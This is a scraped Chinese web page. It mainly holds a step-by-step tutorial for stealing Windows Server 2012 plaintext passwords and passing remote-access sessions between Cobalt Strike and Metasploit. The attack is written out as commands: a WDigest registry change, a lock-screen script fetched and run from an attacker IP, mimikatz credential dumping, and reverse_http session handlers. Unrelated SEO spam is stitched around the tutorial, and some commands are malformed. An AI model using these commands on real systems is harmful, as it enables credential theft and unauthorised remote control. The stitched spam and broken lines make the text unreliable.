当前位置: 首页 > news >正文

深圳营销型网站建设方案服务商手机怎么解除禁止访问网页

深圳营销型网站建设方案服务商,手机怎么解除禁止访问网页,企业网站建设xplogo,网站敏感目录漏洞修复cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.yayakq.cn/news/487121/

相关文章:

  • 京东购物下载seo关键词排名优化怎么做
  • 西安模板建站网站成都网站建设天府软件园
  • 沈阳网站制作流程企业网站推广网站
  • 综合型网站建设成都建设网站公司
  • 查询网站dns服务器ppt模板简约 淡雅 大气
  • 注册网站后怎么建设建旅游网站费用明细
  • 哈尔滨做网站需要多少钱求个a站
  • 没备案网站如何通过百度联盟审核农村网站建设
  • 上线吧做的网站可以备案宝应县城乡建设局网站
  • jsp网站开发之html入门知识关于做网站公司周年大促销
  • 腾讯分分彩做号网站企业网络搭建教程
  • 大型网站开发技术gowers wordpress com
  • 电商网站规划做喜报的网站
  • 芜湖门户网站建设多少钱今天发生的重大新闻事件
  • 门户网站建设方案是什么意思建设官网银行
  • 小说网站开发环境那个号wordpress在线邮箱验证码
  • iis默认网站建设中注册一个小网站
  • 网站换模板影响建设银行人力资源系统网站
  • 网站跟系统的区别是西安网站制作顶尖公
  • vue做企业网站wordpress网站下方
  • 长沙网络推广网站制作手机网站开发 html5
  • 做个英文网站多少钱宝安网站改版
  • 科协建设网站 方案商标综合查询
  • 网站设计对网站搜索引擎友好性的影响百度云盘官网
  • 网站流量数据wordpress 关闭功能
  • 东莞 网站 建设企业形象设计论文2000字
  • 网站平台建设合同模版平台网站 备案吗
  • 路北网站制作软件定制开发公司官网
  • 乌苏市电力建设工程公司网站莆田个人仿牌外贸网站建设
  • 少儿类网站怎么做wordpress 网站换域名